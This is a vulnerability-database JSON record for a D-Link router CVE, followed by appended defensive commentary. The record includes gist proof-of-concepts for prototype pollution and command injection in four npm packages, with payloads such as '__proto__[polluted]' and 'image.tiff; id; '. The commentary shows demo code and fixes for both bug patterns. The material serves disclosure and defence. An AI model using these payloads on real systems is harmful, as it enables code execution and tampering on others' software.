{"vulnerability": "CVE-2025-6370", "sightings": [{"uuid": "752cfcd7-eab8-4856-ace8-68f226e1c73c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-6370", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114774193882630947", "content": "", "creation_timestamp": "2025-06-30T20:26:56.815052Z"}, {"uuid": "a63c8035-5ae1-4cab-b808-546d9131a90d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-6370", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3ls3fo2yiva2r", "content": "", "creation_timestamp": "2025-06-21T01:29:15.160889Z"}, {"uuid": "ab9eb8fb-0616-4d54-b614-556035611c90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-63709", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3m5bxdzb5do2s", "content": "", "creation_timestamp": "2025-11-10T15:38:51.413525Z"}, {"uuid": "830b981a-e156-4360-88a1-ca32e1c54074", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-63703", "type": "seen", "source": "https://gist.github.com/6en6ar/bdc8e0d472406ab98431f10273cbdbf3", "content": "Product: https://www.npmjs.com/package/parse-ini\nVersion: v1.0.6\nVulnerability type: Prototype Pollution inside parse-ini npm package through version 1.0.6\nCVE ID: CVE-2025-63703\n\nDescription: \nThere exists a prototype pollution vulnerability in the parse-ini npm package, more specifically on lines 101 
and 104 inside index.js,\nwhere the code does not check for the presence of attacker-controlled prototypes that can be supplied inside .ini files.\nPrototype pollution enables an attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects,\nwhich can lead to code execution or denial of service in certain scenarios.\n\nPayload used:\n\nvar parser = require('parse-ini');\nvar iniObj = parser.parse('file.ini');\nconsole.log(iniObj.__proto__); // polluted\nconsole.log({}.polluted); // polluted\nconsole.log(iniObj.MySectionName.lastUsed);\n\nPayload used (file.ini):\n\n; file.ini\nvariable1 = value1\n[MySectionName]\nlastUsed=3\n[__proto__]\npolluted = \"polluted\"", "creation_timestamp": "2026-05-06T19:46:52.000000Z"}, {"uuid": "ff47658c-441d-4e13-9949-de177382b406", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-6370", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19084", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-6370\n\ud83d\udd25 CVSS Score: 8.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: A vulnerability classified as critical was found in D-Link DIR-619L 2.06B01. Affected by this vulnerability is the function formWlanGuestSetup of the file /goform/formWlanGuestSetup. The manipulation of the argument curTime leads to a stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This vulnerability only affects products that are no longer supported by the maintainer.\n\ud83d\udccf Published: 2025-06-20T22:00:15.539Z\n\ud83d\udccf Modified: 2025-06-20T22:00:15.539Z\n\ud83d\udd17 References:\n1. https://vuldb.com/?id.313363\n2. https://vuldb.com/?ctiid.313363\n3. 
https://vuldb.com/?submit.597423\n4. https://github.com/wudipjq/my_vuln/blob/main/D-Link6/vuln_70/70.md\n5. https://www.dlink.com/", "creation_timestamp": "2025-06-20T22:44:49.000000Z"}, {"uuid": "6b2ab262-363f-46b6-a97b-847431e9b8bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-63708", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3m5tq2j2wt62j", "content": "", "creation_timestamp": "2025-11-17T17:16:11.715778Z"}, {"uuid": "087a794c-efd4-48a8-91a1-dd9455f587ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-63704", "type": "seen", "source": "https://gist.github.com/6en6ar/d62f614dbb2b1032b5e45a56fe26ec8b", "content": "Product: https://www.npmjs.com/package/query-string-parser\nVersion: v1.0.0\nVulnerability type: Prototype Pollution vulnerability inside query-string-parser through version 1.0.0\nCVE ID: CVE-2025-63704\nDiscovered: lelecolacola123, 6en6ar\n\nDescription: \nThe NPM package query-string-parser does not properly sanitize user-supplied query parameters and merges them into the newly created object. 
\nThis happens inside the _fillValue function in index.js, when calling fromQuery to parse query parameters.\n\nPayload used:\n\n> const { toQuery, fromQuery } = require('query-string-parser')\n> const queryString = fromQuery(\"a=1&b=2&__proto__[polluted]=polluted\")\n> console.log(\"Query string object polluted: \" + queryString.__proto__.polluted)\n> console.log(\"Polluted object: \" + {}.polluted)\n> let obj = {}\n> console.log(\"Newly created obj: \" + obj.polluted)", "creation_timestamp": "2026-05-06T19:53:03.000000Z"}, {"uuid": "ff137241-e047-4bb0-ac1b-b07eb0e930a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-63705", "type": "seen", "source": "https://gist.github.com/6en6ar/a2ac44da0f4e580190be3e66cfbb9a4a", "content": "Product: https://www.npmjs.com/package/node-ts-ocr\nVersion: v1.0.15\nVulnerability type: OS Command Injection in node-ts-ocr through version 1.0.15\nCVE ID: CVE-2025-63705\n\nDescription: \n\nThe invokeImageOcr function inside src/index.js does not sanitize the imagePath variable on line 156, which is attacker-controlled, when using child_process to execute a command.\nThe node-ts-ocr package provides a wrapper for modifying and manipulating image files. One of the commands it uses for this is tesseract in the invokeImageOcr function. If an attacker provides a string such as 'image.tiff; id; ', it can inject this command into the cmd variable that is later executed by child_process.\nThe imagePath variable is not sanitized and this leads to command injection. 
\n\nPayload used:\n\n> import { Ocr } from 'node-ts-ocr';\n>\n> // Thin wrapper around the vulnerable call; fileName flows into imagePath unchanged.\n> export async function runTesseract(fileName) {\n>   return await Ocr.invokeImageOcr('test_tesseract', fileName);\n> }\n>\n> async function main() {\n>   try {\n>     var ret = await runTesseract('image.tiff; id; ');\n>     console.log('Result testing invokeImageOcr -> ', ret);\n>   } catch (err) {\n>     console.error('error running OCR:', err);\n>   }\n> }\n>\n> main();", "creation_timestamp": "2026-05-06T19:56:42.000000Z"}, {"uuid": "e86e92f8-0137-409f-89ba-bf48237ffc8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-63706", "type": "seen", "source": "https://gist.github.com/6en6ar/607368f1fc8fe429f03c6e0d9486ba72", "content": "\nProduct: https://www.npmjs.com/package/@jswork/next-npm-version\nVersion: v1.0.1\nVulnerability type: Command injection inside @jswork/next-npm-version through version 1.0.1\nCVE ID: CVE-2025-63706\n\nDescription: \nThe NPM package next-npm-version, through the function nx.npmVersion defined on line 19 inside index.js, does not properly sanitize the inName variable before it is passed to execSync, which executes a command using npm show.\nAn attacker is able to inject code when calling the npmVersion function to check the version of the npm package. This is possible because the code is not sanitizing the inName variable before it is passed to child_process execSync.\nThis code uses the npm show CLI command to execute the code.\n\nPayload used:\n\n> import '@jswork/next-npm-version';\n>\n> console.log(nx.npmVersion('node-ts-ocr && id #'));\n> // '2.6.0'\n>\n> This executes the 'id' command.", "creation_timestamp": "2026-05-06T19:59:28.000000Z"}]}
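The two prototype-pollution sightings above (CVE-2025-63703 in parse-ini, CVE-2025-63704 in query-string-parser) share one root cause: a key the attacker chooses, an INI section name in one case and a bracketed query key in the other, is used as a path into a freshly created object, and `__proto__` on that path resolves to `Object.prototype`. The following is an added example written for this page, not code from either package or from the gists. Its `setPath()`, `parseIni()`, `parseQuery()` and `demo()` are hypothetical names; in "unsafe" mode it reproduces the pattern, in "safe" mode it applies the two fixes practitioners ship, rejecting `__proto__`/`constructor`/`prototype` and building containers with `Object.create(null)`:

```javascript
// Added example for this page, not code from parse-ini, query-string-parser
// or the gists above. Both CVE-2025-63703 and CVE-2025-63704 come down to one
// sink: an attacker-chosen key used as a path into a freshly created object.
// setPath() reproduces that sink in "unsafe" mode and hardens it in "safe"
// mode; the two small parsers feed it INI sections and bracket keys.

const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// Walk `segments` into `root`, creating intermediate containers.
//   unsafe: every segment is trusted. root["__proto__"] resolves to
//           Object.prototype, so the final write lands on every object.
//   safe:   the dangerous names are rejected outright, and containers are
//           built with a null prototype so there is nothing to climb onto.
function setPath(root, segments, value, { safe }) {
  let node = root;
  for (let i = 0; i < segments.length; i++) {
    if (node === null || typeof node !== "object") {
      throw new Error("path collides with a scalar value");
    }
    const key = segments[i];
    if (safe && FORBIDDEN_KEYS.has(key)) {
      throw new Error(`refusing attacker-controllable key ${JSON.stringify(key)}`);
    }
    if (i === segments.length - 1) {
      node[key] = value;
      return;
    }
    if (safe) {
      if (!Object.hasOwn(node, key)) node[key] = Object.create(null);
    } else if (node[key] === undefined) {
      node[key] = {};
    }
    node = node[key];
  }
}

// INI: "[section]" headers followed by "key = value" lines. Section and key
// names are the attacker-controlled path segments.
function parseIni(text, { safe }) {
  const result = safe ? Object.create(null) : {};
  let section = [];
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (line === "" || line[0] === ";" || line[0] === "#") continue;
    const header = /^\[(.+)\]$/.exec(line);
    if (header) { section = [header[1].trim()]; continue; }
    const eq = line.indexOf("=");
    if (eq < 0) continue;
    setPath(result, [...section, line.slice(0, eq).trim()], line.slice(eq + 1).trim(), { safe });
  }
  return result;
}

// Query string: "a=1&x[y][z]=2" -> path ["x", "y", "z"]. The published
// payload key "__proto__[polluted]" becomes ["__proto__", "polluted"].
function parseQuery(qs, { safe }) {
  const result = safe ? Object.create(null) : {};
  for (const pair of qs.replace(/^\?/, "").split("&")) {
    if (pair === "") continue;
    const eq = pair.indexOf("=");
    const rawKey = decodeURIComponent(eq < 0 ? pair : pair.slice(0, eq));
    const value = eq < 0 ? "" : decodeURIComponent(pair.slice(eq + 1));
    const segments = rawKey.split(/\[|\]\[|\]/).filter((s) => s !== "");
    setPath(result, segments, value, { safe });
  }
  return result;
}

// Constructed inputs in the shape of the two published payloads.
const CONSTRUCTED_INI = [
  "; file.ini (constructed sample)",
  "variable1 = value1",
  "[MySectionName]",
  "lastUsed=3",
  "[__proto__]",
  "polluted = polluted",
].join("\n");
const CONSTRUCTED_QUERY = "a=1&b=2&__proto__[polluted]=polluted";

// Run each parser both ways and report what happened to an unrelated {}.
function demo() {
  const report = {};
  const runs = [
    ["ini", (safe) => parseIni(CONSTRUCTED_INI, { safe })],
    ["query", (safe) => parseQuery(CONSTRUCTED_QUERY, { safe })],
  ];
  for (const [name, run] of runs) {
    run(false);
    report[`${name}UnsafePollutes`] = ({}).polluted === "polluted";
    delete Object.prototype.polluted; // undo the damage before the next round
    let rejected = false;
    try { run(true); } catch { rejected = true; }
    report[`${name}SafeRejects`] = rejected;
    report[`${name}SafeClean`] = ({}).polluted === undefined;
  }
  return report;
}

console.log(demo());
```

Safe mode fails closed (it throws on the first forbidden segment) rather than silently dropping the key; either is defensible, but a parser that skips the key should still be tested with `({}).polluted` afterwards, because `Object.create(null)` only protects objects the parser itself creates, not ones a caller later merges into with `Object.assign` or a deep-merge helper.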
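The two command-injection sightings (CVE-2025-63705 in node-ts-ocr, CVE-2025-63706 in @jswork/next-npm-version) are likewise one bug twice: a caller-controlled string is concatenated into a command that `child_process` hands to `/bin/sh`, so `;`, `&&` and `$()` in the string are executed. The example below is added for this page and is not code from either package or the gists. It uses `printf` as a stand-in for tesseract/npm so it runs offline, and its `runThroughShell()`, `runWithoutShell()` and `validateImagePath()` are hypothetical names: the first is the vulnerable `exec()` shape, the second the `execFile()` argv shape that removes the shell, and the third the input policy a wrapper should apply before spawning anything at all.

```javascript
// Added example for this page, not code from node-ts-ocr,
// @jswork/next-npm-version or the gists above. CVE-2025-63705 and
// CVE-2025-63706 both interpolate a caller-controlled string into a command
// that child_process runs through /bin/sh. The same input goes through exec()
// (shell) and execFile() (argv, no shell); printf stands in for tesseract/npm
// and echoes each argument on its own line, so the output shows how many
// arguments the child actually received.
const { execSync, execFileSync } = require("node:child_process");
const path = require("node:path");

// Vulnerable shape: string concatenation into exec(), i.e. `sh -c "..."`.
// Everything the shell understands (; && | $() and backticks) is live.
function runThroughShell(imagePath) {
  return execSync(`printf '%s\\n' ${imagePath}`, { encoding: "utf8" });
}

// Hardened shape: program plus argv array into execFile(). No shell is
// started, so the metacharacters are just bytes inside one argument.
function runWithoutShell(imagePath) {
  return execFileSync("printf", ["%s\n", imagePath], { encoding: "utf8" });
}

// Defence in depth: the tool still sees the path, so constrain it before
// spawning anything. Hypothetical policy: stays under baseDir, looks like an
// image file, contains no control characters. Returning an absolute path also
// means the argument can never start with "-" and be parsed as an option.
function validateImagePath(userPath, baseDir) {
  if (typeof userPath !== "string" || userPath === "") {
    throw new TypeError("imagePath must be a non-empty string");
  }
  if (/[\0\r\n]/.test(userPath)) throw new Error("control characters not allowed");
  if (!/\.(tiff?|png|jpe?g)$/i.test(userPath)) throw new Error("unexpected extension");
  const base = path.resolve(baseDir);
  const resolved = path.resolve(base, userPath);
  if (!resolved.startsWith(base + path.sep)) throw new Error("path escapes base directory");
  return resolved;
}

// Constructed input in the shape of the gist's 'image.tiff; id; ', with an
// echo marker instead of id so the effect is visible in the captured output.
const CONSTRUCTED_INPUT = "image.tiff; echo INJECTED";

function demo() {
  const shellLines = runThroughShell(CONSTRUCTED_INPUT).split("\n").filter(Boolean);
  const argvLines = runWithoutShell(CONSTRUCTED_INPUT).split("\n").filter(Boolean);
  let validatorRejected = false;
  try { validateImagePath(CONSTRUCTED_INPUT, "/srv/uploads"); } catch { validatorRejected = true; }
  return { shellLines, argvLines, validatorRejected };
}

console.log(demo());
```

Through the shell the child prints two lines, `image.tiff` and `INJECTED`, because `echo INJECTED` ran as a second command; through `execFile` it prints the whole string as one literal argument. Note that `execFile` with `{ shell: true }`, or `spawn` with `shell: true`, reintroduces the same problem, so the option to audit for is the shell, not the function name.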